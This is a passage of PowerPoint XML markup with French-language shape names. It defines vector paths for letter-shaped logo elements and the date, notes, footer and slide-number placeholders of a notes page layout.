                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34C61F85-749E-4706-96A6-87F0063FE8EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3657599" y="4356067"/>
              <a:ext cx="300323" cy="434721"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY0" fmla="*/ 244316 h 434721"/>
                <a:gd name="connsiteX1" fmla="*/ 239078 w 300323"/>
                <a:gd name="connsiteY1" fmla="*/ 244316 h 434721"/>
                <a:gd name="connsiteX2" fmla="*/ 239078 w 300323"/>
                <a:gd name="connsiteY2" fmla="*/ 168593 h 434721"/>
                <a:gd name="connsiteX3" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY3" fmla="*/ 168593 h 434721"/>
                <a:gd name="connsiteX4" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY4" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX5" fmla="*/ 292418 w 300323"/>
                <a:gd name="connsiteY5" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX6" fmla="*/ 292418 w 300323"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 300323"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 300323"/>
                <a:gd name="connsiteY8" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX9" fmla="*/ 300323 w 300323"/>
                <a:gd name="connsiteY9" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX10" fmla="*/ 300323 w 300323"/>
                <a:gd name="connsiteY10" fmla="*/ 354330 h 434721"/>
                <a:gd name="connsiteX11" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY11" fmla="*/ 354330 h 434721"/>
                <a:gd name="connsiteX12" fmla="*/ 88963 w 300323"/>
                <a:gd name="connsiteY12" fmla="*/ 244316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323" h="434721">
                  <a:moveTo>
                    <a:pt x="88963" y="244316"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="239078" y="244316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239078" y="168593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88963" y="168593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88963" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292418" y="80391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292418" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300323" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300323" y="354330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88963" y="354330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88963" y="244316"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="222221"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fr-FR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Forme libre : forme 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C513627B-6DDD-4BB4-8DF5-8ECAA272A8DE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4122514" y="4348162"/>
              <a:ext cx="426053" cy="442626"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 212693 w 426053"/>
                <a:gd name="connsiteY0" fmla="*/ 235839 h 442626"/>
                <a:gd name="connsiteX1" fmla="*/ 29623 w 426053"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 442626"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 426053"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 442626"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 426053"/>
                <a:gd name="connsiteY3" fmla="*/ 442627 h 442626"/>
                <a:gd name="connsiteX4" fmla="*/ 88868 w 426053"/>
                <a:gd name="connsiteY4" fmla="*/ 442627 h 442626"/>
                <a:gd name="connsiteX5" fmla="*/ 88868 w 426053"/>
                <a:gd name="connsiteY5" fmla="*/ 210122 h 442626"/>
                <a:gd name="connsiteX6" fmla="*/ 198215 w 426053"/>
                <a:gd name="connsiteY6" fmla="*/ 347758 h 442626"/>
                <a:gd name="connsiteX7" fmla="*/ 227171 w 426053"/>
                <a:gd name="connsiteY7" fmla="*/ 347758 h 442626"/>
                <a:gd name="connsiteX8" fmla="*/ 337185 w 426053"/>
                <a:gd name="connsiteY8" fmla="*/ 210122 h 442626"/>
                <a:gd name="connsiteX9" fmla="*/ 337185 w 426053"/>
                <a:gd name="connsiteY9" fmla="*/ 442627 h 442626"/>
                <a:gd name="connsiteX10" fmla="*/ 426053 w 426053"/>
                <a:gd name="connsiteY10" fmla="*/ 442627 h 442626"/>
                <a:gd name="connsiteX11" fmla="*/ 426053 w 426053"/>
                <a:gd name="connsiteY11" fmla="*/ 0 h 442626"/>
                <a:gd name="connsiteX12" fmla="*/ 397097 w 426053"/>
                <a:gd name="connsiteY12" fmla="*/ 0 h 442626"/>
                <a:gd name="connsiteX13" fmla="*/ 212693 w 426053"/>
                <a:gd name="connsiteY13" fmla="*/ 235839 h 44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053" h="442626">
                  <a:moveTo>
                    <a:pt x="212693" y="235839"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="29623" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="210122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198215" y="347758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227171" y="347758"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337185" y="210122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337185" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426053" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="426053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397097" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212693" y="235839"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="222221"/>
            </a:solid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7B0B8432-FD75-4941-A77B-99507AAD8D5D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4724018" y="4356139"/>
              <a:ext cx="319788" cy="434553"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 308470 w 319788"/>
                <a:gd name="connsiteY0" fmla="*/ 82560 h 434553"/>
                <a:gd name="connsiteX1" fmla="*/ 276275 w 319788"/>
                <a:gd name="connsiteY1" fmla="*/ 38078 h 434553"/>
                <a:gd name="connsiteX2" fmla="*/ 226840 w 319788"/>
                <a:gd name="connsiteY2" fmla="*/ 9503 h 434553"/>
                <a:gd name="connsiteX3" fmla="*/ 163975 w 319788"/>
                <a:gd name="connsiteY3" fmla="*/ -22 h 434553"/>
                <a:gd name="connsiteX4" fmla="*/ -45 w 319788"/>
                <a:gd name="connsiteY4" fmla="*/ -22 h 434553"/>
                <a:gd name="connsiteX5" fmla="*/ -45 w 319788"/>
                <a:gd name="connsiteY5" fmla="*/ 434509 h 434553"/>
                <a:gd name="connsiteX6" fmla="*/ 88823 w 319788"/>
                <a:gd name="connsiteY6" fmla="*/ 434509 h 434553"/>
                <a:gd name="connsiteX7" fmla="*/ 88823 w 319788"/>
                <a:gd name="connsiteY7" fmla="*/ 281061 h 434553"/>
                <a:gd name="connsiteX8" fmla="*/ 163689 w 319788"/>
                <a:gd name="connsiteY8" fmla="*/ 281061 h 434553"/>
                <a:gd name="connsiteX9" fmla="*/ 226554 w 319788"/>
                <a:gd name="connsiteY9" fmla="*/ 270869 h 434553"/>
                <a:gd name="connsiteX10" fmla="*/ 275989 w 319788"/>
                <a:gd name="connsiteY10" fmla="*/ 242294 h 434553"/>
                <a:gd name="connsiteX11" fmla="*/ 308184 w 319788"/>
                <a:gd name="connsiteY11" fmla="*/ 197813 h 434553"/>
                <a:gd name="connsiteX12" fmla="*/ 319709 w 319788"/>
                <a:gd name="connsiteY12" fmla="*/ 140663 h 434553"/>
                <a:gd name="connsiteX13" fmla="*/ 308470 w 319788"/>
                <a:gd name="connsiteY13" fmla="*/ 82560 h 434553"/>
                <a:gd name="connsiteX14" fmla="*/ 211981 w 319788"/>
                <a:gd name="connsiteY14" fmla="*/ 185906 h 434553"/>
                <a:gd name="connsiteX15" fmla="*/ 163689 w 319788"/>
                <a:gd name="connsiteY15" fmla="*/ 203337 h 434553"/>
                <a:gd name="connsiteX16" fmla="*/ 89204 w 319788"/>
                <a:gd name="connsiteY16" fmla="*/ 203337 h 434553"/>
                <a:gd name="connsiteX17" fmla="*/ 89204 w 319788"/>
                <a:gd name="connsiteY17" fmla="*/ 78274 h 434553"/>
                <a:gd name="connsiteX18" fmla="*/ 163689 w 319788"/>
                <a:gd name="connsiteY18" fmla="*/ 78274 h 434553"/>
                <a:gd name="connsiteX19" fmla="*/ 212362 w 319788"/>
                <a:gd name="connsiteY19" fmla="*/ 95324 h 434553"/>
                <a:gd name="connsiteX20" fmla="*/ 229507 w 319788"/>
                <a:gd name="connsiteY20" fmla="*/ 140186 h 434553"/>
                <a:gd name="connsiteX21" fmla="*/ 211981 w 319788"/>
                <a:gd name="connsiteY21" fmla="*/ 185906 h 43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9788" h="434553">
                  <a:moveTo>
                    <a:pt x="308470" y="82560"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="301116" y="65557"/>
                    <a:pt x="290134" y="50373"/>
                    <a:pt x="276275" y="38078"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="261844" y="25381"/>
                    <a:pt x="245042" y="15669"/>
                    <a:pt x="226840" y="9503"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206562" y="2865"/>
                    <a:pt x="185311" y="-353"/>
                    <a:pt x="163975" y="-22"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="-45" y="-22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="-45" y="434509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="434509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="281061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163689" y="281061"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="185073" y="281320"/>
                    <a:pt x="206342" y="277872"/>
                    <a:pt x="226554" y="270869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="244747" y="264677"/>
                    <a:pt x="261540" y="254967"/>
                    <a:pt x="275989" y="242294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289743" y="229907"/>
                    <a:pt x="300716" y="214747"/>
                    <a:pt x="308184" y="197813"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316061" y="179803"/>
                    <a:pt x="319985" y="160317"/>
                    <a:pt x="319709" y="140663"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320147" y="120715"/>
                    <a:pt x="316318" y="100905"/>
                    <a:pt x="308470" y="82560"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="211981" y="185906"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="198951" y="198081"/>
                    <a:pt x="181492" y="204382"/>
                    <a:pt x="163689" y="203337"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="89204" y="203337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89204" y="78274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163689" y="78274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="181549" y="77133"/>
                    <a:pt x="199113" y="83285"/>
                    <a:pt x="212362" y="95324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224002" y="107283"/>
                    <a:pt x="230203" y="123511"/>
                    <a:pt x="229507" y="140186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230136" y="157178"/>
                    <a:pt x="223811" y="173692"/>
                    <a:pt x="211981" y="185906"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="222221"/>
            </a:solid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E6EF6CB0-E597-4953-829E-C2CB62263B0E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5129116" y="4348474"/>
              <a:ext cx="320413" cy="450200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 291991 w 320413"/>
                <a:gd name="connsiteY0" fmla="*/ 244245 h 450200"/>
                <a:gd name="connsiteX1" fmla="*/ 212648 w 320413"/>
                <a:gd name="connsiteY1" fmla="*/ 192620 h 450200"/>
                <a:gd name="connsiteX2" fmla="*/ 163213 w 320413"/>
                <a:gd name="connsiteY2" fmla="*/ 170807 h 450200"/>
                <a:gd name="connsiteX3" fmla="*/ 125685 w 320413"/>
                <a:gd name="connsiteY3" fmla="*/ 149757 h 450200"/>
                <a:gd name="connsiteX4" fmla="*/ 112540 w 320413"/>
                <a:gd name="connsiteY4" fmla="*/ 121182 h 450200"/>
                <a:gd name="connsiteX5" fmla="*/ 128352 w 320413"/>
                <a:gd name="connsiteY5" fmla="*/ 89273 h 450200"/>
                <a:gd name="connsiteX6" fmla="*/ 166452 w 320413"/>
                <a:gd name="connsiteY6" fmla="*/ 78986 h 450200"/>
                <a:gd name="connsiteX7" fmla="*/ 213505 w 320413"/>
                <a:gd name="connsiteY7" fmla="*/ 92226 h 450200"/>
                <a:gd name="connsiteX8" fmla="*/ 249414 w 320413"/>
                <a:gd name="connsiteY8" fmla="*/ 129088 h 450200"/>
                <a:gd name="connsiteX9" fmla="*/ 309994 w 320413"/>
                <a:gd name="connsiteY9" fmla="*/ 82320 h 450200"/>
                <a:gd name="connsiteX10" fmla="*/ 254367 w 320413"/>
                <a:gd name="connsiteY10" fmla="*/ 23360 h 450200"/>
                <a:gd name="connsiteX11" fmla="*/ 165785 w 320413"/>
                <a:gd name="connsiteY11" fmla="*/ 24 h 450200"/>
                <a:gd name="connsiteX12" fmla="*/ 109111 w 320413"/>
                <a:gd name="connsiteY12" fmla="*/ 8501 h 450200"/>
                <a:gd name="connsiteX13" fmla="*/ 63391 w 320413"/>
                <a:gd name="connsiteY13" fmla="*/ 32885 h 450200"/>
                <a:gd name="connsiteX14" fmla="*/ 33102 w 320413"/>
                <a:gd name="connsiteY14" fmla="*/ 71747 h 450200"/>
                <a:gd name="connsiteX15" fmla="*/ 21957 w 320413"/>
                <a:gd name="connsiteY15" fmla="*/ 122801 h 450200"/>
                <a:gd name="connsiteX16" fmla="*/ 29863 w 320413"/>
                <a:gd name="connsiteY16" fmla="*/ 164235 h 450200"/>
                <a:gd name="connsiteX17" fmla="*/ 51580 w 320413"/>
                <a:gd name="connsiteY17" fmla="*/ 197858 h 450200"/>
                <a:gd name="connsiteX18" fmla="*/ 84822 w 320413"/>
                <a:gd name="connsiteY18" fmla="*/ 225195 h 450200"/>
                <a:gd name="connsiteX19" fmla="*/ 127304 w 320413"/>
                <a:gd name="connsiteY19" fmla="*/ 247960 h 450200"/>
                <a:gd name="connsiteX20" fmla="*/ 173405 w 320413"/>
                <a:gd name="connsiteY20" fmla="*/ 269010 h 450200"/>
                <a:gd name="connsiteX21" fmla="*/ 214267 w 320413"/>
                <a:gd name="connsiteY21" fmla="*/ 291394 h 450200"/>
                <a:gd name="connsiteX22" fmla="*/ 228745 w 320413"/>
                <a:gd name="connsiteY22" fmla="*/ 323017 h 450200"/>
                <a:gd name="connsiteX23" fmla="*/ 212553 w 320413"/>
                <a:gd name="connsiteY23" fmla="*/ 358545 h 450200"/>
                <a:gd name="connsiteX24" fmla="*/ 168166 w 320413"/>
                <a:gd name="connsiteY24" fmla="*/ 371118 h 450200"/>
                <a:gd name="connsiteX25" fmla="*/ 103968 w 320413"/>
                <a:gd name="connsiteY25" fmla="*/ 352068 h 450200"/>
                <a:gd name="connsiteX26" fmla="*/ 80536 w 320413"/>
                <a:gd name="connsiteY26" fmla="*/ 331970 h 450200"/>
                <a:gd name="connsiteX27" fmla="*/ 61486 w 320413"/>
                <a:gd name="connsiteY27" fmla="*/ 308253 h 450200"/>
                <a:gd name="connsiteX28" fmla="*/ -45 w 320413"/>
                <a:gd name="connsiteY28" fmla="*/ 353878 h 450200"/>
                <a:gd name="connsiteX29" fmla="*/ 168166 w 320413"/>
                <a:gd name="connsiteY29" fmla="*/ 450080 h 450200"/>
                <a:gd name="connsiteX30" fmla="*/ 228079 w 320413"/>
                <a:gd name="connsiteY30" fmla="*/ 441222 h 450200"/>
                <a:gd name="connsiteX31" fmla="*/ 276180 w 320413"/>
                <a:gd name="connsiteY31" fmla="*/ 415505 h 450200"/>
                <a:gd name="connsiteX32" fmla="*/ 308470 w 320413"/>
                <a:gd name="connsiteY32" fmla="*/ 374357 h 450200"/>
                <a:gd name="connsiteX33" fmla="*/ 320280 w 320413"/>
                <a:gd name="connsiteY33" fmla="*/ 319683 h 450200"/>
                <a:gd name="connsiteX34" fmla="*/ 291991 w 320413"/>
                <a:gd name="connsiteY34" fmla="*/ 244245 h 4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0413" h="450200">
                  <a:moveTo>
                    <a:pt x="291991" y="244245"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="268969" y="222276"/>
                    <a:pt x="242061" y="204771"/>
                    <a:pt x="212648" y="192620"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="163213" y="170807"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150021" y="165086"/>
                    <a:pt x="137448" y="158033"/>
                    <a:pt x="125685" y="149757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116884" y="142963"/>
                    <a:pt x="111969" y="132286"/>
                    <a:pt x="112540" y="121182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111635" y="108465"/>
                    <a:pt x="117684" y="96255"/>
                    <a:pt x="128352" y="89273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139763" y="82180"/>
                    <a:pt x="153021" y="78603"/>
                    <a:pt x="166452" y="78986"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183101" y="78626"/>
                    <a:pt x="199484" y="83236"/>
                    <a:pt x="213505" y="92226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227869" y="101926"/>
                    <a:pt x="240099" y="114472"/>
                    <a:pt x="249414" y="129088"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="309994" y="82320"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="296887" y="58168"/>
                    <a:pt x="277713" y="37846"/>
                    <a:pt x="254367" y="23360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227697" y="7217"/>
                    <a:pt x="196941" y="-885"/>
                    <a:pt x="165785" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146573" y="-105"/>
                    <a:pt x="127447" y="2755"/>
                    <a:pt x="109111" y="8501"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92433" y="13580"/>
                    <a:pt x="76898" y="21863"/>
                    <a:pt x="63391" y="32885"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50685" y="43576"/>
                    <a:pt x="40369" y="56816"/>
                    <a:pt x="33102" y="71747"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25491" y="87677"/>
                    <a:pt x="21681" y="105152"/>
                    <a:pt x="21957" y="122801"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21710" y="137010"/>
                    <a:pt x="24396" y="151116"/>
                    <a:pt x="29863" y="164235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35140" y="176596"/>
                    <a:pt x="42484" y="187967"/>
                    <a:pt x="51580" y="197858"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61372" y="208437"/>
                    <a:pt x="72554" y="217634"/>
                    <a:pt x="84822" y="225195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98481" y="233679"/>
                    <a:pt x="112674" y="241283"/>
                    <a:pt x="127304" y="247960"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173405" y="269010"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187721" y="275118"/>
                    <a:pt x="201408" y="282615"/>
                    <a:pt x="214267" y="291394"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224106" y="298830"/>
                    <a:pt x="229545" y="310713"/>
                    <a:pt x="228745" y="323017"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229469" y="336792"/>
                    <a:pt x="223421" y="350052"/>
                    <a:pt x="212553" y="358545"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199551" y="367517"/>
                    <a:pt x="183940" y="371937"/>
                    <a:pt x="168166" y="371118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145306" y="371594"/>
                    <a:pt x="122865" y="364935"/>
                    <a:pt x="103968" y="352068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95500" y="346174"/>
                    <a:pt x="87651" y="339441"/>
                    <a:pt x="80536" y="331970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73573" y="324575"/>
                    <a:pt x="67201" y="316645"/>
                    <a:pt x="61486" y="308253"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="-45" y="353878"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="33578" y="414924"/>
                    <a:pt x="98500" y="452054"/>
                    <a:pt x="168166" y="450080"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188473" y="450259"/>
                    <a:pt x="208686" y="447270"/>
                    <a:pt x="228079" y="441222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245614" y="435818"/>
                    <a:pt x="261949" y="427087"/>
                    <a:pt x="276180" y="415505"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289829" y="404323"/>
                    <a:pt x="300859" y="390275"/>
                    <a:pt x="308470" y="374357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316499" y="357264"/>
                    <a:pt x="320538" y="338567"/>
                    <a:pt x="320280" y="319683"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321433" y="291747"/>
                    <a:pt x="311232" y="264534"/>
                    <a:pt x="291991" y="244245"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="222221"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fr-FR"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9404085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3076363" cy="513508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="94622" tIns="47311" rIns="94622" bIns="47311" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé de la date 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4021294" y="0"/>
            <a:ext cx="3076363" cy="513508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="94622" tIns="47311" rIns="94622" bIns="47311" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{C6DB7731-FC51-4E60-B106-D1AD59633F54}" type="datetimeFigureOut">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>23/04/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de l'image des diapositives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4622" tIns="47311" rIns="94622" bIns="47311" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé des notes 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709931" y="4925408"/>
            <a:ext cx="5679440" cy="4029878"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="94622" tIns="47311" rIns="94622" bIns="47311"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1" y="9721108"/>
            <a:ext cx="3076363" cy="513507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="94622" tIns="47311" rIns="94622" bIns="47311"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021294" y="9721108"/>
            <a:ext cx="3076363" cy="513507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="94622" tIns="47311" rIns="94622" bIns="47311" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{F04AE4AD-211C-4D97-B7EE-CA5AF1C374D5}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Groupe 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1370AF87-1C3F-451E-9028-93B1C4523601}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
